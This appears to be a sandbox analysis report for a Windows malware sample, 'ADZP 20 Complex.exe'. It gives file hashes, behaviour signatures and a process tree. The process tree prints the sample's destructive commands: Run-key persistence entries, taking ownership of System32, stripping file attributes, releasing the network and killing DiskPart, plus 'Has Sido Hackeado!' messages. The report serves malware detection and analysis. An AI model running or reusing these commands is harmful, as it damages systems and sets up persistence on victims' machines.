| SHA256 | 2cda289b5067c9daf8b4dffdf323b2fe9d0a47bfdbb91b4a017029bc74729c05 |
| SHA512 | 89fbf1b423f17101970290b070d740b8d58beecc6723e64edb7ae23b9285afe3a612b8e8f5ec202d60aca3875a28dbc556a43af9fe4113ac0bdba1fa83c5213a |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | 9905e5a33c6edd8eb5f59780afbf74de |
| SHA1 | 64b2cd0186ff6fe05072ee88e2bb54476023772e |
| SHA256 | c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3 |
| SHA512 | e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 6989502044e4a9fca67e9ded25de9956 |
| SHA1 | 9a8d099caad939d32599530b27f7db641cbdb8da |
| SHA256 | b370b54e95376f4b6df27592bc23343c82ebbfad3d52e71a38a2aac504bda04c |
| SHA512 | 9f0e6d59d9adc531f5c162b964205e0dd63c6a956291af48d24e6b8988a940b6f2cc7644a9163277e6383a6d9f8ddb00c9687d73426ea776c691e73f66e95a5e |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | 71fd425076906cb37b388bd4c66245bc |
| SHA1 | 8800125746ca6583e104e87e9ee4f5432ed8d277 |
| SHA256 | 0dc9ecbb73150b018ba351f1a814c990b66258ad65c03bb219fa2f94daa72462 |
| SHA512 | c6ad02fd230b5b73060bfabeaabd4b9aa99a8e93669cb8682a3d90c8b3d04361feb7cd672c3b5df693a8affd6d47b29bed1af4a3c3209acb503e19f0df56aa4b |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 7659392a12010d8c761cb9888f6fd5ac |
| SHA1 | b8829c26628740b77ab7405c231f420e860d8c1f |
| SHA256 | 71bd0bffdeca9dce2b4e9e1d767a0732657032171f3ad33903dec353ef95a431 |
| SHA512 | 5caf94b288649b687f411cbb5519168e09e161f8d9545a6bad1b0d08876a542d153a115f8b44e3f15d973812ce8ec7471bba7d8bd0b9a22d0abf6fdf2914a2bf |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 482dcfe952218cf31ad2adddd8f6616b |
| SHA1 | 7a6bcfce28c76bc3319c871696531d21200f3bc0 |
| SHA256 | 093b0f0c3f7a9bf24406662245b57f171837a266aba49f198319045e971e77d5 |
| SHA512 | 440182ba5cd7c85abc11fe9097a41486469afde738d26f471efe4e7928106cd57240b1045bc97d60c42147ca25b032c4149487f1a1ab4581292c7eff2bc801b9 |
memory/3328-1416-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3420-1420-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3636-1441-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3588-1563-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/4004-1607-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/1844-1608-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3160-1658-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3208-1682-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/4128-1683-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 5dfd819273a34eeb1a213e66dd8308a7 |
| SHA1 | 65291936bcbe05742a6bc15d989d5e3acff59998 |
| SHA256 | 7699fff0e361a55cce19ca7922fae4f70eb6ca56b770223fab5d1fd936b0a184 |
| SHA512 | d19cf3e05df7d5d1f360d20a47e2658d03067cffce1b767bf2e430ebba5f49bcdb37e9c098c195c919682bf90b5a54c508dad587bff3f4c1c73ac6065b019913 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | e8154d032d09f3a8141d83a5c37bca37 |
| SHA1 | 2056b4fd9315b05ec898a9a8ae3fd3f71725e178 |
| SHA256 | cd006059daa5d7a94ab2174eadc5e512dcb6a0e00dcdf780cc7b82feef47dc5d |
| SHA512 | 68ea57415e45d15f1d06daee04f91f850c042be59009029810661998870e34bea6363d85a2051dce1c15ecf0fb2074c10a21c539fdda9f0fbea58fb77bf2974c |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 1df648b8938c8b7caa81b94f71a6c2b8 |
| SHA1 | 7e33f73142a9675d07d84eefdfac1e5ad4f46302 |
| SHA256 | d60b007f67db5216f7564a359206987b506536bd457a8e219773eb5f549b0f43 |
| SHA512 | 784b19a3efa06388e34ca1c5252f3c90e8e2822efb713246cdcb386bb8fa71f57653ac3a47a9f20bcf65231cba633a6db42c5d7af1f6c6d0de85e939007506f0 |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 873781e160d6c7a2c7100536f95e373a |
| SHA1 | 439389553b0f4b61327c0160a92e4c8ddca8f84d |
| SHA256 | e244905c9acc529b7d7dbd58453f44dbd3f3d627bba23adcf375afde9b6b2a35 |
| SHA512 | 1116b365d1e44dbad9fcdf462bb3467dbe3ab8b40a01c7dc6d516b24d2b1260c405cbda80f7a1177f89412a2db726a68e6ae2ceee839c117061ecbb75a06a4aa |
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
| MD5 | 929d76643e667f8d6faa590f5cfee782 |
| SHA1 | e120fdfc91c88681f835b703c336908b9cd4b649 |
| SHA256 | dedb3209e6ffe8a68578145eda5a34b9f64108c4ccb3b228fb9fa3d7ada5380a |
| SHA512 | bfd61aaf55a50d3c4bbb0386ac02aebfdf14fb8d009bc47eb0e6398b49229222e3c0b7d23b22b235efa14398d6340084d0b9b683bbd9c3ab2f66c0a6d27a4171 |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | e81bc86c82f05df09bd2e672eac54a68 |
| SHA1 | 02198bf44db7526a2183abfff64e620030aa98a7 |
| SHA256 | 9ac737a874df34eb2d4f19e5bc3149eb5955e0fccf14363214a1759d5b7515b0 |
| SHA512 | aad00720782ef10a2042e649b1f5cdbea3c97f602c1a3ebf4f24980c4d76e8c546d2822aa36acfa3385002525dc7c006a93cb39b180b342b42ae1015f9762de5 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | f3ccea48138ac09c0bc2389af0069408 |
| SHA1 | e831ec354e0b89707725de246e9a0fc24b32d8e0 |
| SHA256 | a8a238e43d25c7ac3217c1018e499b7759e1da6c5df7e105d8674a5e886136c0 |
| SHA512 | b1e22e70da41ef9ab26ef782e2d1f513178817a0c638d27e56998837562f4185a2252db9a09710a5d9a996db48b37f2d5862edbb2c4c140af5ef7d81c015f167 |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 8d485f3ac2acb6e586e8f1d8af2df57f |
| SHA1 | 43e9653ecedbad263a5e015ecaa3eebb7a44feb9 |
| SHA256 | 530f6ebaf4445acb0855efc516729598a3312aeedd0ef9024da6f347f152e783 |
| SHA512 | 4105fa612f86d46457f77449c095cd9e1f59dcb4d137bf3d822e4f52f89c517faadfbaa00b07d15aabfc0d2afdb093ea63d59add313525149f17b7427917494b |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 8f6a10af4ac605b703ce68c1b1ed22a1 |
| SHA1 | d715ac83dcec9878704376d219eb2d46ca3478f1 |
| SHA256 | 1101b4863ec8cfa6f783e63a28f7f8433f9722110e3b68f3599c5b8140f05dfe |
| SHA512 | a33417ef9ef0e4d89e6579e285a7c57328b32c9fec20e00d0eff092bab127007124267995d201e72592f7623d0a0d418ba641a612015859beb68d314e92c8fb4 |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 21321634b2c2bf8223d389be19d13d4e |
| SHA1 | 116c0af8712cc2120fbb6c4893f9a99a77242960 |
| SHA256 | fa1ddb950fadc33035dc70e015155e7db6fefaddc05d83cc1fab233e3c416f60 |
| SHA512 | feea91421292af2cb0348c6c09b2bbe810f3a3385c5b5ddbb7e6312aa7f97f48eebf10d6f9966b2fee8f4e843e87ceabf78318c9ac9b070478f0372471acce20 |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | a60bef51e93491d1a9df2540b51d17e0 |
| SHA1 | ef002c05c71e01c43c48ee4c5030cae7dc49ee2a |
| SHA256 | ff0df070a7893c6744498aaa16ff93b44fdfa9d153bcffcc78f637952f299d13 |
| SHA512 | 7b34b56d6ec5fc85649827834e24caef89d2fe0bdcf9fbc82402f6a56319ae2d06c5a2bd0f1fffd9bc4ec3154adceebeb041fb1076642f6a2e7d334366c022ed |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 277e1a2dd49b05d06fc57a224f172e8c |
| SHA1 | cfbc082cd9f07678a247a3a45e1b18bab8b972e7 |
| SHA256 | 9614387211e9f37f5defa24434741e5c68eb281bc2964e7a1bd4d2063f4ecb2a |
| SHA512 | dd6f5e3a9ab8abb6dd133a6b1374634e083d765f4cf306c3aebdcb82196f3329b89b09ccdfbad8fc691ad6b31160f8d9ea814126ae1ba08b7020e54662d73512 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | b6957bf19cc51a25a9500aad7d3cee2d |
| SHA1 | d03db03ae31f0fdc799538ca51307bb3dc914873 |
| SHA256 | 62bde1ceb28b3ca2701a708724e6e9b94adfafaba6066bc67d6117d38f64c733 |
| SHA512 | 13f9f5e553f93b8d0f9d2707c904fe5837597e257e92625c0004e43ea8477ca927d4aaee3db767766d1c5b301b4ef8051ed886fc74d599b0aa852f741dad98a9 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 8bd8da93e70bc44eed6f071f1dde2a12 |
| SHA1 | 3b4e1f1d5545dcedaa1af5139d7343ba1c185a5e |
| SHA256 | 6c847b728fd94006cdcb5f2ed700ef9ab63c7db4ae27cfea33d5c0b9f7343a5c |
| SHA512 | bd3a78a91e9199782d8c333aa3330a59ee4ae3fbdcfe5affb31fc9406ee4d635330666768bc69ee5cfddb5db5bfa72deea3002ca999b30d573979d3ed2777922 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 97e8be4af2e5fc71f1b80ab6d934efb1 |
| SHA1 | 9f9f5169b2a8db1941a0b6c6f6cac953b32a5cb8 |
| SHA256 | 9a5b02a76a9f5274c5055712f41952084f373fa86a304a704ad0d12378bbd9f3 |
| SHA512 | 4fabda2a6e8b5f16af1c8b71e2648724ac9a397c1be465b115b6734dc6be7bccc2d2041e7224a13a6de8cff4a16ea7fe0f9844d3e95bbe2dc9a7955dde920cd0 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 8d06b1ef5aeb70cd3d95fccabff1293e |
| SHA1 | 8cd80b4b5c88658c0eb8a2e7abaa9f5afdc37517 |
| SHA256 | 6e4d057052e7ee49a106b1655b41a7f5a2c70f5b71bd1966278f08cf3107dfe0 |
| SHA512 | 4c6cb8838268269169ab0228d02b17bb53a5e3befd21f0ad62d5ad453cb5f7fd259f3c018823a745f7536c98edcc05869666b1b3c92c41e25104669425530313 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | ea260c435f9eb83e2b5041e734ff3598 |
| SHA1 | ca70d64367cbdffbbf24e82baff4048119203a2e |
| SHA256 | 3ade659fdae17c11c3f42b712f94045691fbd0b413428b73e1de8fe699e74615 |
| SHA512 | 548624cc523aeb4136376f792d23b3f2aee4a676362f8a0dd0e8161f0df87ab926b82f67fc174eb5d9473c23f49e6ca962bc84479967f7e624250d94efa66876 |
memory/1220-2474-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/536-2473-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/2988-2475-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3328-2476-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3420-2477-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3636-2478-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3588-2479-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/4004-2480-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/1844-2481-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3160-2482-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3208-2483-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/4128-2484-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/344-2485-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/5908-2486-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/6280-2487-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/6364-2488-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/6112-2489-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/1864-2490-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/3856-2491-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/7056-2492-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/4432-2493-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/4372-2494-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/5352-2495-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/5420-2496-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/5532-2497-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/5856-2498-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/5940-2499-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/4440-2500-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/4316-2501-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/5548-2502-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/5904-2503-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/6352-2504-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/7240-2505-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 16:32
Reported
2024-05-25 16:35
Platform
win10v2004-20240426-en
Max time kernel
18s
Max time network
154s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Reads user/profile data of web browsers
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3A0B.tmp\3A0C.tmp\3A0D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
